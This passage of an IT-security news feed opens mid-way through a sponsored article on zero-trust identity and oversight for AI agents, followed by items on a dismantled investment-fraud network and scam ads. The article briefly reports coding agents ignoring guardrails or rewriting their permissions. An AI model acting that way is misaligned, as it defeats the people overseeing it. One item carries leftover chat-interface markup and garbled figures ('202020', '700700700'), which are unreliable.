rather than once at login.</p><p>"Zero trust really just says, just enough, just in time," Durand says. "It's your next action that we care about. We're moving identity from an era where access was our runtime control point — meaning were you logged in, did you have a session — toward the decision that sits behind that login."</p><h2>Why agents must be treated as first-class identities</h2><p>That shift to decision-based control has direct implications for how agents should be provisioned in the first place. The common practice of letting an agent operate under a cloned human login or a shared service account doesn't work, Durand says. </p><p>"Each agent should have its own identity," he explains. "It should not be impersonating the human. It can act on behalf of the human, we could explicitly delegate authority to an agent, but we don't want to blur the lines between the human taking action and the agent taking action."</p><p>And beyond that is another concern: the shared secrets, API keys in particular, that many service accounts still rely on. For example, the habit of embedding keys directly in source code, where they can be committed accidentally and exposed, is a convenient but weak security pattern that agentic workflows make considerably riskier. Building service account architectures that let agents authenticate without relying on those shared credentials or other long-lived standing access is now an urgent priority rather than a long-term cleanup project.</p><h2>Where enterprises can enforce zero trust policies</h2><p>Enforcing any of this in practice requires identifying where policy can actually be applied. Several existing choke points, including API gateways and the agent gateway sitting in front of MCP servers, offer practical locations where enterprises can inspect what an agent is requesting and apply policy rules before granting it.</p><p>"Those policies could leverage real-time risk and fraud signals, and then enforce, deterministically, what the agent can do when it interacts with these systems," Durand explains.</p><p>The goal is to move authorization from something decided once at login to something evaluated at the moment of every consequential action, such as an agent attempting to commit code to a repository. Instead of carrying a standing permission to write to GitHub, the agent's request would be checked against context and policy at that specific moment, closing the window of trust down to the scope of a single action.</p><h2>Stopping AI agents from rewriting their own permissions</h2><p>That model becomes especially important given how agents can behave once they are already inside a system — for example, coding agents that have acknowledged, when questioned, either ignoring a specific guardrail entirely, or attempting to rewrite the permissions they were given.</p><p>"Who's watching the watcher? Zero trust needs to apply here," Durand says. "If generative AI systems follow your instruction 97% of the time, and you're simply asking it for advice, that might be fine. If it's responsible for making a decision about who gets let in, 97% is not good enough."</p><h2>How to trust AI-generated output at agent speed</h2><p>The answer to that gap is not to eliminate AI from the review process, but to structure reviews so no single agent’s judgment is taken at face value. Because human review cannot scale to the volume and speed of agentic output without erasing the advantage of using agents at all, a new framework is necessary, so that when one agent produces work, such as code, separate agents evaluate it, provided those reviewing agents are kept from communicating with one another or with the one they are checking. It's a new human-AI paradigm, Durand says.</p><p>"We probably will have to develop frameworks that we trust without seeing or verifying the output directly," he explains. "It's not that that construct is 100% foolproof. However, it's the best we can do to move at agent speed. We can't trust the exact output, but we can trust the framework."</p><p>In practice, that means combining automated review with clear human accountability for higher-risk decisions, rather than treating agent output as self-validating. </p><p>For traditional auditors, reviewing every transaction individually is never feasible, and statistically valid sampling stands in for full verification. The same applies to risk accumulation: a single agent action might carry little risk on its own, while a sequence of actions moving in a consistent direction could cross a threshold that triggers an intervention, including a kill switch capable of halting the agent before further harm occurs.</p><h2>What to ask when evaluating agentic identity platforms</h2><p>For security leaders evaluating identity platforms for agentic AI, there's no narrow checklist. Enterprises should evaluate what their full lifecycle of agent management looks like. Most enterprises are managing agents on two fronts simultaneously: customer-facing agents acting on behalf of external users, and internal agents deployed to automate enterprise processes.</p><p>"Pause long enough to see the totality of what it would mean to secure multiple agents, both interacting with you from the outside as well as being deployed on the inside," Durand says. "We need discovery and visibility of all the agents operating within our estate, a place to register them, a standard way to assign custodians, and a way to construct and centralize policy so security can enforce it across the organization."</p><p>And while basic security principles were already fully understood before agentic AI arrived, what has changed, Durand says, is that the cost of moving slowly has finally caught up with the cost of moving carelessly, giving enterprises a narrowing window to build the right architecture before widespread agentic adoption makes retrofitting far more expensive. </p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA warns of actively exploited SharePoint flaws.]]></title>
<description><![CDATA[A new stealthy ransomware family emerges. Law enforcement operation disrupts international fraud scheme.]]></description>
<link>https://tsecurity.de/de/3674133/it-security-nachrichten/cisa-warns-of-actively-exploited-sharepoint-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674133/it-security-nachrichten/cisa-warns-of-actively-exploited-sharepoint-flaws/</guid>
<pubDate>Thu, 16 Jul 2026 18:41:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new stealthy ransomware family emerges. Law enforcement operation disrupts international fraud scheme.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Authorities Arrest Multiple Suspects in Global Investment Fraud Investigation]]></title>
<description><![CDATA[  Dutch authorities have arrested multiple suspects as part of an international investigation into an alleged investment fraud network that investigators believe defrauded victims worldwide through fake online investment schemes, with the operation at one point generating more than €100…
Read mor...]]></description>
<link>https://tsecurity.de/de/3674117/it-security-nachrichten/dutch-authorities-arrest-multiple-suspects-in-global-investment-fraud-investigation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674117/it-security-nachrichten/dutch-authorities-arrest-multiple-suspects-in-global-investment-fraud-investigation/</guid>
<pubDate>Thu, 16 Jul 2026 18:41:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Dutch authorities have arrested multiple suspects as part of an international investigation into an alleged investment fraud network that investigators believe defrauded victims worldwide through fake online investment schemes, with the operation at one point generating more than €100…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-authorities-arrest-multiple-suspects-in-global-investment-fraud-investigation/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-authorities-arrest-multiple-suspects-in-global-investment-fraud-investigation/">Dutch Authorities Arrest Multiple Suspects in Global Investment Fraud Investigation</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police Disrupt €100 Million Investment Fraud Network Operating 20 Call Centers]]></title>
<description><![CDATA[Dutch police have moved against a large investment-fraud operation that allegedly used a network of call centers to reach victims at scale. The case shows how organized fraud can borrow the speed, scripts, and customer-service appearance of a legitimate business…
Read more →
The post Dutch Police...]]></description>
<link>https://tsecurity.de/de/3673953/it-security-nachrichten/dutch-police-disrupt-100-million-investment-fraud-network-operating-20-call-centers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673953/it-security-nachrichten/dutch-police-disrupt-100-million-investment-fraud-network-operating-20-call-centers/</guid>
<pubDate>Thu, 16 Jul 2026 17:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police have moved against a large investment-fraud operation that allegedly used a network of call centers to reach victims at scale. The case shows how organized fraud can borrow the speed, scripts, and customer-service appearance of a legitimate business…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-police-disrupt-e100-million-investment-fraud-network-operating-20-call-centers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-police-disrupt-e100-million-investment-fraud-network-operating-20-call-centers/">Dutch Police Disrupt €100 Million Investment Fraud Network Operating 20 Call Centers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police Disrupt €100 Million Investment Fraud Network Operating 20 Call Centers]]></title>
<description><![CDATA[Dutch police have moved against a large investment-fraud operation that allegedly used a network of call centers to reach victims at scale. The case shows how organized fraud can borrow the speed, scripts, and customer-service appearance of a legitimate business while steering people toward inves...]]></description>
<link>https://tsecurity.de/de/3673647/it-security-nachrichten/dutch-police-disrupt-100-million-investment-fraud-network-operating-20-call-centers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673647/it-security-nachrichten/dutch-police-disrupt-100-million-investment-fraud-network-operating-20-call-centers/</guid>
<pubDate>Thu, 16 Jul 2026 15:39:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police have moved against a large investment-fraud operation that allegedly used a network of call centers to reach victims at scale. The case shows how organized fraud can borrow the speed, scripts, and customer-service appearance of a legitimate business while steering people toward investments that do not exist. The suspected network, said to have […]</p>
<p>The post <a href="https://cybersecuritynews.com/police-disrupt-investment-fraud-network/">Dutch Police Disrupt €100 Million Investment Fraud Network Operating 20 Call Centers</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Invoice Fraud Is Now a Cybersecurity Exposure]]></title>
<description><![CDATA[A recent Wall Street Journal report described how alleged fake invoices were used to support a roughly $400 million private credit loan. The fraud eventually surfaced through a simple signal during invoice...
The post Invoice Fraud Is Now a Cybersecurity Exposure appeared first on Cyber Defense M...]]></description>
<link>https://tsecurity.de/de/3673333/it-security-nachrichten/invoice-fraud-is-now-a-cybersecurity-exposure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673333/it-security-nachrichten/invoice-fraud-is-now-a-cybersecurity-exposure/</guid>
<pubDate>Thu, 16 Jul 2026 13:53:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1024" height="768" src="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Invoice-Fraud-Is-Now-a-Cybersecurity-Exposure.png.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" loading="lazy" srcset="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Invoice-Fraud-Is-Now-a-Cybersecurity-Exposure.png.jpg 1024w, https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Invoice-Fraud-Is-Now-a-Cybersecurity-Exposure.png-768x576.jpg 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px"><p>A recent Wall Street Journal report described how alleged fake invoices were used to support a roughly $400 million private credit loan. The fraud eventually surfaced through a simple signal during invoice...</p>
<p>The post <a href="https://www.cyberdefensemagazine.com/invoice-fraud-is-now-a-cybersecurity-exposure/" data-wpel-link="internal">Invoice Fraud Is Now a Cybersecurity Exposure</a> appeared first on <a href="https://www.cyberdefensemagazine.com/" data-wpel-link="internal">Cyber Defense Magazine</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The end of burner phones? A new FCC proposal could kill anonymous prepaid phones — and it's been branded 'misguided and counterproductive']]></title>
<description><![CDATA[The FCC might soon ban anonymous phone lines in the US, which could help prevent fraud and scams but might also harm lots of innocent people.]]></description>
<link>https://tsecurity.de/de/3673250/it-nachrichten/the-end-of-burner-phones-a-new-fcc-proposal-could-kill-anonymous-prepaid-phones-and-its-been-branded-misguided-and-counterproductive/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673250/it-nachrichten/the-end-of-burner-phones-a-new-fcc-proposal-could-kill-anonymous-prepaid-phones-and-its-been-branded-misguided-and-counterproductive/</guid>
<pubDate>Thu, 16 Jul 2026 13:33:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The FCC might soon ban anonymous phone lines in the US, which could help prevent fraud and scams but might also harm lots of innocent people.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police and Europol Disrupt Global Investment Scam Infrastructure and Arrest Key Suspects]]></title>
<description><![CDATA[Dutch police, working with international law-enforcement partners including Europol, have disrupted a sprawling investment-fraud operation alleged to have defrauded victims across multiple countries of more than €100 million every month. The investigation has resulted in arrests in Poland, Cyprus...]]></description>
<link>https://tsecurity.de/de/3673227/it-security-nachrichten/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673227/it-security-nachrichten/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/</guid>
<pubDate>Thu, 16 Jul 2026 13:20:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police, working with international law-enforcement partners including Europol, have disrupted a sprawling investment-fraud operation alleged to have defrauded victims across multiple countries of more than €100 million every month. The investigation has resulted in arrests in Poland, Cyprus, Belgium,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/">Dutch Police and Europol Disrupt Global Investment Scam Infrastructure and Arrest Key Suspects</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police and Europol Disrupt Global Investment Scam Infrastructure and Arrest Key Suspects]]></title>
<description><![CDATA[Dutch police, working with international law-enforcement partners including Europol, have disrupted a sprawling investment-fraud operation alleged to have defrauded victims across multiple countries of more than €100 million every month. The investigation has resulted in arrests in Poland, Cyprus...]]></description>
<link>https://tsecurity.de/de/3673146/it-security-nachrichten/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673146/it-security-nachrichten/dutch-police-and-europol-disrupt-global-investment-scam-infrastructure-and-arrest-key-suspects/</guid>
<pubDate>Thu, 16 Jul 2026 12:54:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police, working with international law-enforcement partners including Europol, have disrupted a sprawling investment-fraud operation alleged to have defrauded victims across multiple countries of more than €100 million every month. The investigation has resulted in arrests in Poland, Cyprus, Belgium, and Greece, targeting a network that operated around twenty fraudulent call centers staffed by more […]</p>
<p>The post <a href="https://gbhackers.com/europol-disrupt-global-investment-scam/">Dutch Police and Europol Disrupt Global Investment Scam Infrastructure and Arrest Key Suspects</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Police Arrest Suspects Behind €100 Million-a-Month Crypto Investment Scam Network]]></title>
<description><![CDATA[Dutch police have arrested multiple suspects linked to an international cryptocurrency investment fraud network accused of stealing an estimated € 100 million every month from victims worldwide. The operation, carried out with Belgian police, Europol, and authorities in several countries, targete...]]></description>
<link>https://tsecurity.de/de/3673078/it-security-nachrichten/police-arrest-suspects-behind-100-million-a-month-crypto-investment-scam-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673078/it-security-nachrichten/police-arrest-suspects-behind-100-million-a-month-crypto-investment-scam-network/</guid>
<pubDate>Thu, 16 Jul 2026 12:23:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police have arrested multiple suspects linked to an international cryptocurrency investment fraud network accused of stealing an estimated € 100 million every month from victims worldwide. The operation, carried out with Belgian police, Europol, and authorities in several countries, targeted a network that allegedly ran around 202020 call centers staffed by more than 700700700 […]</p>
<p>The post <a href="https://cyberpress.org/police-bust-e100m-scam/">Police Arrest Suspects Behind €100 Million-a-Month Crypto Investment Scam Network</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Police take down investment fraud network that stole €100 million a month]]></title>
<description><![CDATA[Dutch police, working alongside Belgian authorities and Europol, have dismantled a major criminal network accused of operating a global investment fraud scheme through dozens of fraudulent call centers. Investigators estimate the organization generated more than €100 million a month by…
Read more...]]></description>
<link>https://tsecurity.de/de/3672935/it-security-nachrichten/police-take-down-investment-fraud-network-that-stole-100-million-a-month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672935/it-security-nachrichten/police-take-down-investment-fraud-network-that-stole-100-million-a-month/</guid>
<pubDate>Thu, 16 Jul 2026 11:23:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police, working alongside Belgian authorities and Europol, have dismantled a major criminal network accused of operating a global investment fraud scheme through dozens of fraudulent call centers. Investigators estimate the organization generated more than €100 million a month by…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/police-take-down-investment-fraud-network-that-stole-e100-million-a-month/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/police-take-down-investment-fraud-network-that-stole-e100-million-a-month/">Police take down investment fraud network that stole €100 million a month</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Police take down investment fraud network that stole €100 million a month]]></title>
<description><![CDATA[Dutch police, working alongside Belgian authorities and Europol, have dismantled a major criminal network accused of operating a global investment fraud scheme through dozens of fraudulent call centers. Investigators estimate the organization generated more than €100 million a month by targeting ...]]></description>
<link>https://tsecurity.de/de/3672806/it-security-nachrichten/police-take-down-investment-fraud-network-that-stole-100-million-a-month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672806/it-security-nachrichten/police-take-down-investment-fraud-network-that-stole-100-million-a-month/</guid>
<pubDate>Thu, 16 Jul 2026 10:39:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch police, working alongside Belgian authorities and Europol, have dismantled a major criminal network accused of operating a global investment fraud scheme through dozens of fraudulent call centers. Investigators estimate the organization generated more than €100 million a month by targeting victims in multiple countries. The group operated around 20 call centers staffed by more than 700 people posing as financial advisers. The main suspect, a 46-year-old man with Israeli and Polish citizenship, was arrested … <a href="https://www.helpnetsecurity.com/2026/07/16/dutch-police-investment-fraud-ring-dismantled/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/dutch-police-investment-fraud-ring-dismantled/">Police take down investment fraud network that stole €100 million a month</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fraudulent Ads Generate 304 Million Impressions Across Europe in Under One Month]]></title>
<description><![CDATA[Scam advertisements generated more than 304 million impressions across the European Union and United Kingdom in under one month, showing how advertising platforms continue to give fraud operators massive reach. The findings come from Gen’s Scam Ad Machine research, which analyzed millions of adve...]]></description>
<link>https://tsecurity.de/de/3672722/it-security-nachrichten/fraudulent-ads-generate-304-million-impressions-across-europe-in-under-one-month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672722/it-security-nachrichten/fraudulent-ads-generate-304-million-impressions-across-europe-in-under-one-month/</guid>
<pubDate>Thu, 16 Jul 2026 09:53:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Scam advertisements generated more than 304 million impressions across the European Union and United Kingdom in under one month, showing how advertising platforms continue to give fraud operators massive reach. The findings come from Gen’s Scam Ad Machine research, which analyzed millions of advertisements delivered to European audiences. Gen analyzed 14.57 million advertisements, representing 10.76 […]</p>
<p>The post <a href="https://cyberpress.org/fraudulent-ads-hit-304m/">Fraudulent Ads Generate 304 Million Impressions Across Europe in Under One Month</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Police Disrupt a €140M Cyber Fraud Ring in Spain]]></title>
<description><![CDATA[Iberian hackers carried out a variety of cyberattacks and laundered the winnings through complex financial networks.]]></description>
<link>https://tsecurity.de/de/3672627/it-security-nachrichten/police-disrupt-a-140m-cyber-fraud-ring-in-spain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672627/it-security-nachrichten/police-disrupt-a-140m-cyber-fraud-ring-in-spain/</guid>
<pubDate>Thu, 16 Jul 2026 09:24:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Iberian hackers carried out a variety of cyberattacks and laundered the winnings through complex financial networks.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police Arrest Key Suspect in €100M Global Crypto Investment Scam]]></title>
<description><![CDATA[A major global crypto investment scam investigation has led to the arrest of an alleged key figure behind an international criminal organization accused of defrauding victims of more than €100 million every month. Dutch police announced multiple arrests across Europe following a long-running inve...]]></description>
<link>https://tsecurity.de/de/3672412/it-security-nachrichten/dutch-police-arrest-key-suspect-in-100m-global-crypto-investment-scam/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672412/it-security-nachrichten/dutch-police-arrest-key-suspect-in-100m-global-crypto-investment-scam/</guid>
<pubDate>Thu, 16 Jul 2026 07:24:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="global crypto investment scam" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Dutch-Police-global-crypto-investment-scam-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Dutch Police Arrest Key Suspect in €100M Global Crypto Investment Scam 1"></p><div class="qMYqUG_convSearchResultHighlightRoot">
<div class="" data-turn-id-container="request-6a570ccc-c7c4-83e8-8c25-9333dd212593-1" data-is-intersecting="true"><section class="text-token-text-primary w-full focus:outline-none has-data-writing-block:pointer-events-none [&amp;:has([data-writing-block])&gt;*]:pointer-events-auto R6Vx5W_threadScrollVars scroll-mb-[calc(var(--scroll-root-safe-area-inset-bottom,0px)+var(--thread-response-height))] scroll-mt-[calc(var(--header-height)+min(200px,max(70px,20svh)))]" dir="auto" data-turn-id="request-6a570ccc-c7c4-83e8-8c25-9333dd212593-1" data-turn-id-container="request-6a570ccc-c7c4-83e8-8c25-9333dd212593-1" data-testid="conversation-turn-30" data-turn="assistant">
<div class="text-base my-auto mx-auto pb-15 [--thread-content-margin:var(--thread-content-margin-xs,calc(var(--spacing)*4))] @w-sm/main:[--thread-content-margin:var(--thread-content-margin-sm,calc(var(--spacing)*6))] @w-lg/main:[--thread-content-margin:var(--thread-content-margin-lg,calc(var(--spacing)*16))] px-(--thread-content-margin)">
<div class="[--thread-content-max-width:40rem] @w-lg/main:[--thread-content-max-width:48rem] mx-auto max-w-(--thread-content-max-width) flex-1 group/turn-messages focus-visible:outline-hidden relative flex w-full min-w-0 flex-col agent-turn" data-conversation-screenshot-content="">
<div class="flex max-w-full flex-col gap-4 grow">
<div class="min-h-8 text-message relative flex w-full flex-col items-end gap-2 text-start break-words whitespace-normal outline-none keyboard-focused:focus-ring [.text-message+&amp;]:mt-1" dir="auto" tabindex="0" data-message-author-role="assistant" data-message-id="4b789281-6fe6-42e7-8f60-224abb5fe11f" data-message-model-slug="gpt-5-5" data-turn-start-message="true">
<div class="flex w-full flex-col gap-1 empty:hidden">
<div class="markdown prose dark:prose-invert wrap-break-word w-full light markdown-new-styling">
<p class="PDq2pG_selectionAnchorContainer" data-start="483" data-end="921">A major global crypto investment scam investigation has led to the arrest of an alleged key figure behind an international criminal organization accused of defrauding victims of more than €100 million every month. <a href="https://thecyberexpress.com/wifi-sniffer-russian-spying-dutch-teens/" target="_blank" rel="noopener">Dutch police</a> announced multiple arrests across Europe following a long-running investigation into a fraud network that allegedly employed over 700 people operating from around 20 call centers worldwide.</p>
<p data-start="923" data-end="1254">The main suspect, a 46-year-old dual Israeli and Polish national, was arrested at an airport in Poland on May 26 at the request of Dutch authorities. Investigators believe he played an indispensable role in the organization, which allegedly carried out large-scale <a href="https://thecyberexpress.com/odido-cyberattack-update/" target="_blank" rel="noopener">investment fraud </a>targeting victims across multiple countries.</p>

<h3 data-section-id="1yrlp2m" data-start="1256" data-end="1340"><strong><span role="text">Global Crypto Investment Scam Network Operated Through Worldwide Call Centers</span></strong></h3>
<p data-start="1342" data-end="1692">According to Dutch police, the organization functioned like a professional company with approximately 700 employees spread across nearly 20 offices globally. Individuals working as financial advisors <a class="wpil_keyword_link" href="https://cyble.com/tech-scam/" target="_blank" rel="noopener" title="scam" data-wpil-keyword-link="linked" data-wpil-monitor-id="28982">scam</a> operators allegedly contacted victims daily through online platforms and telephone calls while posing as legitimate investment professionals.</p>
<p data-start="1694" data-end="1965">Authorities <a href="https://www.politie.nl/nieuws/2026/juli/15/02-criminele-organisatie-met-700-medewerkers-verdachten-beleggingsfraude-gearresteerd.html" target="_blank" rel="nofollow noopener">said</a> the organization was structured with a central headquarters overseeing multiple teams, each assigned to target victims in specific countries. Employees reportedly worked under pseudonyms and used technical measures to hide their identities and locations.</p>
<p data-start="1967" data-end="2095"><img class="aligncenter wp-image-113133 size-full" src="https://thecyberexpress.com/wp-content/uploads/crypto-investment-scam-e1784177523473.webp" alt="" width="600" height="338"></p>


[caption id="attachment_113134" align="aligncenter" width="600"]<img class="wp-image-113134 size-full" src="https://thecyberexpress.com/wp-content/uploads/global-crypto-investment-scam-e1784177557156.webp" alt="global crypto investment scam" width="600" height="338"> Excerpts from emails that victims sent to scammers[/caption]
<p data-start="1967" data-end="2095">As part of the investigation, Belgian police arrested five individuals believed to have worked as fraudulent financial advisors.</p>

<h3 data-section-id="wialjj" data-start="2097" data-end="2135"><strong>Multiple Arrests Made Across Europe</strong></h3>
<p data-start="2137" data-end="2215">The investigation resulted in several coordinated arrests during May and July.</p>
<p data-start="2217" data-end="2475">On July 7, authorities arrested two Dutch nationals aged 45 and 34, along with a 34-year-old Belgian, all residing in Cyprus. A 25-year-old suspect was also arrested in Belgium the same day. On July 10, police arrested a 44-year-old Dutch national in Athens.</p>
<p data-start="2477" data-end="2709">The main suspect has since been extradited to the <a href="https://thecyberexpress.com/cyber-fraud-cybersecurity-in-zimbabwe/" target="_blank" rel="noopener">Netherlands</a>, where an examining magistrate ordered 14 days of pre-trial detention. Dutch authorities indicated that additional arrests remain possible as the investigation continues.</p>

<h3 data-section-id="c36f6h" data-start="2711" data-end="2762"><strong><span role="text">How the Global Crypto Investment Scam Worked</span></strong></h3>
<p data-start="2764" data-end="3028">Investigators said the <a href="https://thecyberexpress.com/fbi-in-thailand-scam-centers/" target="_blank" rel="noopener">online investment scam</a> relied on building long-term trust with victims. Individuals posing as account managers or financial advisors maintained frequent contact through phone calls and online communication, sometimes over several months.</p>
<p data-start="3030" data-end="3274">Victims were encouraged to begin with relatively small investments that appeared to generate immediate returns. Police said the investment platforms displayed convincing but fabricated profits, even though no actual investments were being made.</p>
<p data-start="3276" data-end="3524">As confidence grew, victims were persuaded to transfer increasingly larger amounts, often in the form of <a href="https://thecyberexpress.com/cryptocurrency-mixing-service-bitcoin-seized/" target="_blank" rel="noopener">cryptocurrency fraud</a> payments. Instead of being invested, investigators said the funds were diverted directly to the criminal organization.</p>
<p data-start="3526" data-end="3778">Authorities also warned that victims who stop investing may later be contacted by so-called recovery companies requesting upfront deposits to recover lost funds. Police believe these recovery operations may also be connected to the same <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28983">fraud</a> networks.</p>

<h3 data-section-id="rvl0oo" data-start="3780" data-end="3836"><strong><span role="text">Hundreds of Complaints Linked to Investment Fraud</span></strong></h3>
<p data-start="3838" data-end="4076">Dutch authorities have received approximately 550 reports connected to the organization, while Belgian police have recorded around 200 complaints. Investigators estimate the total number of victims worldwide could reach tens of thousands.</p>
<p data-start="4078" data-end="4221">The financial losses reported by victims in the Netherlands alone amount to nearly €25 million, with many individuals losing well over €10,000.</p>
<p data-start="4223" data-end="4372">Dutch police said officers proactively contacted some victims after discovering that many remained unaware they had fallen victim to <a href="https://thecyberexpress.com/cbi-%E2%82%B91000-cr-cyber-fraud-network/" target="_blank" rel="noopener">cyber fraud</a>.</p>
<p data-start="4374" data-end="4478">Financial investigators are now examining whether assets linked to the suspects can be frozen or seized.</p>

